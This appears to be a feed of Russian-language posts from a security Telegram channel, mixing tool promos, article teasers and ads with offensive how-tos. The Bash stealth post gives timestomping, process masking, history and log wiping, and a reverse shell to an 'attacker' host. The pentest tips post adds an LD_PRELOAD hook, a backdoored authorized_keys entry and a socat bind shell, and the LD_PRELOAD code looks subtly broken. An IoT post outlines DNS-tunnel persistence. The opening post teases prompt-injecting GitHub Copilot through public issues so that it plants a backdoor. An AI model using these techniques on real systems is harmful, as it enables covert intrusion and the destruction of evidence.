Охотимся на Copilot 😏 Учебная промпт-инъекция для пентестеров

GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.

⏺В статье поясняют, как устроена такая промпт-инъекция: как спрятать вредоносный текст от глаза мейнтейнера, как Copilot воспринимает контекст, и как формируются прям надежные эксплойты с низким риском обнаружения.

ZeroDay | #Статья

APKHunt: анализ Android-приложений

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺APKHunt - статический анализатор APK, заточенный под стандарты OWASP MASVS. Он сканирует безопасность хранения данных, работу с криптографией, использование разрешений и даже наличие отладочных функций.

⏺Что классного: умеет сканировать сразу несколько APK, формирует лёгкие TXT-отчёты и поддерживает CI/CD-интеграцию. Так что его можно встроить прямо в пайплайн, чтобы каждый билд проходил проверку на автомате.

⏺Кому пригодится: ну разрабам - чтобы не выпускать дырявые релизы, пентестерам, конечно - для ускорения аудита, а архитекторам - для контроля соблюдения стандартов безопасности.

⏺Как потестить самому:

git clone https://github.com/Cyber-Buddy/APKHunt.git
cd APKHunt
go run apkhunt.go -p app.apk -l

ZeroDay | #Инструмент

IoT и DNS-туннели: как закрепляются атакующие

👋 Приветствую в мире цифровой безопасности!

Сегодня посмотрим, как хакеры юзают IoT-устройства для входа в сеть и закрепляются через DNS-туннели.

⏺Как ломают:
1️⃣Сначала ищут потенциальные цели через открытые источники (ripe.net, passive DNS) и сканят сеть с помощью masscan или Angry IP Scanner.
2️⃣Находят уязвимый роутер, L3-коммутатор или камеру и запускают routersploit autopwn - перебор эксплойтов и брутфорс.
3️⃣Дальше небольшой трюк: скомпрометированное устройство тянет пейлоад с VPS через встроенный wget и запускает его. Архитектуры любые: ARM, x86, MIPS и т.д.
4️⃣Готово - IoT превращается в точку входа внутрь сети, через которую можно прокинуть SOCKS proxy и атаковать уже корпоративный сегмент.

⏺В чем плюсы: на IoT нет антивирусов и EDR, системные вызовы никто не мониторит, логи не собирают. А значит, команда exec проходит беспрепятственно.

⏺Где появляется DNS-туннелирование: даже если сеть сегментирована и фильтруется, малварь может «стучаться» на C2-панель через Do53/DoT/DoH, пряча команды в битах DNS-заголовков. Да, ответ на условный ls может идти сутки, но для хакера то главное - это закрепление в сети.

Пример из PoC:

unsigned short __do53_query(char *_qname, __do53_type _qtype, unsigned char *_wire)
{
  _wire[0] = // Вот здесь пейлоад
  _wire[1] = // Вот здесь пейлоад
  _wire[2] = 0x01;
  _wire[3] = 0x00;
  _wire[4] = 0x00;
  _wire[5] = 0x01;
  _wire[6] = 0x00;
  _wire[7] = 0x00;
  _wire[8] = 0x00;
  _wire[9] = 0x00;
  _wire[10] = 0x00;
  _wire[11] = 0x00;
 
  int query_lenght = __ascii_convertation_to_wire(_qname, &(_wire[12]));
  int nextLoc = 12 + query_lenght + 1;
 
  _wire[nextLoc] = 0x00;
  _wire[++nextLoc] = 0x01;
  _wire[++nextLoc] = 0x00;
  _wire[++nextLoc] = 0x01;
 
  return nextLoc + 1;
}

⏺В итоге у нас подломленное устройство раз в час резолвит «невинный» домен вроде metrics-cisco.com и получает команды в Additional-/Authority-секциях. Для NTA-систем это выглядит просто как обычный DNS-запрос.

ZeroDay | #IoT

Шифруем скрипты

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как шифровать скрипты.

⏺Очень часто заказчики получают готовый продукт, но хотят защитить исходный код bash или Python-скриптов. Простая компиляция не помогает.

⏺Как решить: Obash - это обфускатор и шифратор скриптов, который превращает их в исполняемые бинарники с AES-256 шифрованием и аппаратной привязкой.

⏺Ключ и вектор инициализации берутся с железа, а не хардкодятся в бинарнике, что делает невозможным запуск скрипта на чужой машине. Даже если кто-то получит бинарь и посмотрит память или процессы, исходники не увидит.

⏺Как его использовать:

git clone https://github.com/louigi600/obash.git
cd obash/
sudo apt install libssl-dev
make
./obash testme

⏺Привязка к железу: для работы шифрования Obash берёт UUID и Serial устройства. Если рут-доступа нет, можно сделать локальные файлы:

sudo cat /sys/devices/virtual/dmi/id/product_uuid > product_uuid
sudo cat /sys/devices/virtual/dmi/id/product_serial > product_serial

И заменить пути в interpreter.c и obfuscated_bash.c:

char prod_uuid[256]="./product_uuid";
char prod_serial[256]="./product_serial";

⏺Что происходит внутри: Obash шифрует скрипт AES-256, кодирует его в Base64, создаёт промежуточный C-файл (interpreter.c) с функциями интерпретации и компилирует бинарник. Сюда входят и ключи, и вектор, и шифротекст. Бинарник запускается только на целевой машине.

⏺Вот пример тестового скрипта:

#!/bin/bash
echo "my pid is: $$"
echo $0
echo $*
read -p "enter something ... " A
echo $A
sleep 10 &
ps -ef | grep $$
ps -ef | grep $!
sleep 2

В следующем посте будем анализировать шифрованные скрипты

ZeroDay | #скрипты

Анализируем шифрованные скрипты

👋 Приветствую в мире цифровой безопасности!

Продолжим говорить о шифровании скриптов, сегодня же будем их анализировать.

⏺Создадим шифрованный скрипт:

./obash testme -o testme.x

Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.

⏺Попробуем заглянуть внутрь. Если открыть testme.x в редакторе:

mcedit testme.x

Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.

⏺Дальше смотрим, какие библиотеки он тянет:

ldd ./testme.x

Среди зависимостей - libcrypto.so, что подтверждает использование AES.

⏺Теперь глянем системные вызовы:

strace -o log ./testme.x

В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.

⏺Автоматизируем. Сделаем подменный интерпретатор:

gcc fake_interpreter.c -o bash
gcc fake_interpreter.c -o python

Запускаем с подменой:

PATH=.:$PATH ./testme.x

В результате скрипт выводится целиком - никакого шифрования уже нет.

ZeroDay | #скрипты

Корреляция без SIEM: универсальный движок в действии

Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.

⏺В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.

ZeroDay | #Статья

Bandit: быстрый поиск уязвимостей в Python-коде

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.

⏺Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.

⏺Быстрый старт:
Установка через pip:

pip install bandit

Проверка всего проекта:

bandit -r ./my_project

Или проверка конкретного файла:

bandit my_script.py

ZeroDay | #Инструмент

5 фишек Bash для скрытности

👋 Приветствую в мире цифровой безопасности!

Давай расскажу о 5 фишках Bash для того, чтобы работать тише.

⏺Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:

touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh

Так скрипт выглядит как старый системный.

⏺Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:

exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm

Теперь скрипт похож на системный или веб-сервер.

⏺Работа без истории: Чтобы команды не остались в ~/.bash_history:

HISTFILE=/dev/null
set +o history
history -c && history -w

⏺Алиасы для скрытности: Подменяем стандартные команды:

alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'

Первое прячет файлы, второе - убирает следы.

⏺Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:

bash -i >& /dev/tcp/attacker/443 0>&1

Трафик пойдёт через порт 443, что выглядит в принципе привычно.

ZeroDay | #bash

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:

#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>

int open(const char *path, int flags, ...) {
    static int (*orig_open)(const char*, int, ...) = NULL;
    if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
    if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
    return orig_open(path, flags);
}

➡️ Собираем: gcc -fPIC -shared -o evil.so evil.c -ldl
➡️ Запускаем: LD_PRELOAD=./evil.so target_binary

⏺SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:

command="/bin/bash -i" ssh-rsa AAAAB3...

Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».

⏺Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

Или проброс порта с шифрованием:

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22

ZeroDay | #пентест

Новая атака группы APT28 на компании в странах НАТО

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём кампанию российской группировки APT28, нацеленную на компании в странах НАТО.

⏺NotDoor - что это: VBA-бэкдор для Outlook, который следит за входящей почтой и ждёт «триггерного» письма. Как только оно приходит, хакеры могут забирать файлы, слать данные и выполнять команды на вашей машине. Название связано с тем, что в коде часто встречается слово “Nothing”.

⏺Как он попадает в систему: через OneDrive с хитрой техникой DLL side-loading. Запускается DLL (SSPICLI.dll) и сразу отключает защиту макросов. Дальше PowerShell-команды шифруют данные, создают устойчивость через реестр и делают всё максимально незаметно.

⏺Что делает внутри: VBA слушает события Outlook (MAPILogonComplete и NewMailEx), создаёт папку %TEMP%\Temp для временных файлов и отсылает их на Proton Mail. Письма с триггером, например «Daily Report», заставляют выполнять встроенные команды.

⏺Какие команды умеет: cmd - выполнить команду и прислать результат, cmdno - выполнить тихо, dwn - украсть файлы, upl - загрузить файлы на машину жертвы.

⏺Скрытность и фишки: хакеры используют Microsoft Dev Tunnels и Telegram для скрытой связи с C2, ротацию доменов через Cloudflare Workers, маскируют трафик под обычные сервисы - почти полностью «невидимы».

ZeroDay | #безопасность

Корпоративный прокси в одной фото 😁

ZeroDay | #мем

Свой мессенджер вместо MAX: Matrix и XMPP на домашнем сервере

В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.

⏺В статье рассказывается, как на своём сервере автор развернул два конкурирующих протокола - Matrix (Synapse) и XMPP (Ejabberd) - и сравнил их на практике. Пошагово показано разворачивание в Docker с Portainer, объясняется, зачем нужен Coturn для звонков, и какие клиенты удобнее в реальной жизни (спойлер: родители тоже тестировали).

ZeroDay | #Статья

📝 Типы атак на пароли

⏺Browser Autofill Exploit — извлечение сохранённых паролей из автозаполнения браузера.

⏺Brute Force Attack — перебор всех возможных комбинаций символов до нахождения правильного пароля.

⏺Credential Stuffing — использование украденных логинов и паролей из одной утечки для доступа к другим сервисам.

⏺Dictionary Attack — подбор пароля из заранее составленного списка распространённых слов.

⏺Hash Collision Attack — использование слабостей хэш-функций для подбора разных данных с одинаковым хэшем.

⏺Keylogging — запись нажатий клавиш, чтобы перехватить пароль в момент ввода.

⏺Man-in-the-Middle Attack — перехват трафика между пользователем и сервисом для кражи учётных данных.

⏺Password Spraying — проверка нескольких популярных паролей сразу на множестве аккаунтов, чтобы избежать блокировок.

⏺Phishing Attack — обман через поддельные сайты или письма, чтобы выманить пароль у жертвы.

⏺Rainbow Table Attack — использование заранее вычисленных таблиц для расшифровки хэшей паролей.

⏺Shoulder Surfing — подсмотр пароля через плечо или с помощью камер.

⏺Social Engineering — манипуляции с человеком, чтобы заставить его выдать пароль добровольно.

ZeroDay | #атака

Киберустойчивость: как бизнес выживает во время атак

👋 Приветствую в мире цифровой безопасности!

— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»

⏺Такие вопросы сегодня звучат постоянно. Простое «у нас есть защита» уже не успокаивает - бизнесу важно видеть реальную готовность компании выстоять под атаками. Тут на первый план выходит киберустойчивость - умение продолжать работу даже в случае атаки или сбоя.

⏺От CISO ждут не стопки отчётов, а прямого ответа: где настоящие риски и как они бьют по бизнесу.

⏺В Innostage, где, помогают бизнесам строить киберустойчивость, подход строится на трёх принципах:
1️⃣Измеримость — от «недопустимых событий» до Индекса защищённости.
2️⃣Управляемость — понятная логика решений, а не хаос.
3️⃣Финансовая привязка — разговор на языке бизнес-рисков и затрат.

⏺В итоге киберустойчивость уже не дело одного ИБ, а часть стратегии: помогает контролить риски, принимать решения и показывать клиентам и партнёрам, что компании вполне можно доверять.

📅 Об этом будут говорить профи и эксперты на Kazan Digital Week 17–19 сентября.

ZeroDay | #cybersecurity

Sliver — кроссплатформенный фреймворк для Red Team

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: кроссплатформенный фреймворк для эмуляции атак. Работает на Windows, Mac и Linux, а его импланты подстраиваются под вашу цель.

⏺А вот что умеет: он генерирует код за секунды, прячет его при компиляции, работает с staged и stageless payloads. Также тут безопасная связь с сервером через mTLS, WireGuard, HTTP(S) и DNS. Можно скриптить на Python или JS/TS, мигрировать процессы, делать инъекции, манипулировать токенами, разворачивать TCP и named pipe pivot, запускать .NET сборки прямо в памяти… и это только часть.

⏺Зачем нужен: чекнуть, где ваша защита слабая, потренировать команду реагирования и посмотреть, как настоящие Red Team обходят системы, не ломая ничего критичного.

⏺Быстро стартуем:

git clone https://github.com/BishopFox/sliver.git
cd sliver
make
./sliver-server
./sliver-client

ZeroDay | #Инструмент

Вам — защита от блокировок, нам — анализ рисков и транзакций 💙

Заблокировали из-за «грязной» крипты? Вы не одиноки — только в 2024 году 1500+ российских компаний прошли через заморозку счетов. Регулятору нужны не оправдания, а цифры и факты.

⚡️ Но решение есть!

КоинКит ПРО — первый в России инструмент, который показывает не просто тип источника (биржа, обменник, даркнет), а точные суммы от каждой конкретной площадки. Больше никаких догадок — только факты.

Как это работает:

✔️ Теперь ваши доказательства выглядят так:
🟢Binance — 1000 USDT
🟡Uniswap — 500 USDT
🔴Tornado Cash — 500 USDT
Вы будeте знать все конкретные площадки, с которыми взаимодействует ваш контрагент.

✔️ Получайте отчет, адаптированный под российские реалии и санкционные риски. Больше не нужно собирать доказательства вручную;

✔️ Контролируйте свои риски еще детальнее, точечно настраивая допустимые риски на кошельке с API-интеграцией.

🔥 Принимайте безопасные решения — получите демо-доступ к КоинКит ПРО, перейдя по ссылке.

Реклама ООО «КоинКит» ИНН 9724089320 coinkyt.com

Все тонкости GPG-подписей

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём, что такое GPG-подписи и зачем они нужны вообще.

⏺Что это: GPG-подпись - это способ доказать, что файл или сообщение действительно отправил тот, кто его подписал, и что его не подменили по пути. По сути, это как цифровая подпись на бумажном документе, только для файлов и писем. Даже если кто-то перехватит файл, подделать подпись без приватного ключа невозможно.

⏺Подпись файлов:

1️⃣Создаём ключ:

gpg --full-gen-key

Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».

2️⃣Подписываем файл:

gpg --sign -u [email protected] msg

Файл msg.gpg теперь содержит ваше сообщение + подпись.

3️⃣Красивый ASCII-формат:

gpg --armor --sign -u [email protected] msg

Или вариант для людей — clear-sign, где сообщение остаётся читаемым:

gpg --clear-sign -u [email protected] msg

⏺Detached signatures: подпись в отдельном файле, если не хотите смешивать её с сообщением:

gpg --detach-sign -u [email protected] msg
gpg --armor --detach-sign -u [email protected] msg

Проверяем так:

gpg --verify msg.asc
gpg --verify msg.asc msg

Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.

⏺Проверка чужих подписей:

gpg --import key.pub
gpg --verify msg.asc

GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.

ZeroDay | #GPG